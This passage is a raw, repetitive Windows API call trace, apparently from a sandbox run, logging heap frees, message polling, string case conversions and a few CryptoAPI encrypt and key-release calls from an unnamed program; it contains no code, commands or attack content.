lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f3fc8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.893] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x180) returned 1 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.893] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.893] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.893] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.894] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.894] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24f3fc8*, pdwDataLen=0x8bef68*=0x17c, dwBufLen=0x180 | out: pbData=0x24f3fc8*, pdwDataLen=0x8bef68*=0x180) returned 1 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.894] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.894] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.895] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.895] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.895] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.895] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.895] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.895] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.895] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.895] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.895] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.895] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.895] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.897] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0267.897] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.897] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0267.897] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.897] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.898] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.898] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.898] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.898] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.898] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.898] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0267.898] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.898] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.898] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.898] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.898] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.898] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.898] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.899] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.899] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.899] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.899] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.899] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.899] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.899] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.899] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.899] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.900] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.900] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.900] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.900] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.900] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.900] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.900] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.900] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.900] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.900] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.900] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.900] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.900] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.901] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.901] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.901] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.901] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.901] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.901] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.901] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.901] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.901] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.901] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.901] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.901] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.901] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.901] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.902] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.902] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.902] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.902] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.902] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.902] HeapFree (in: 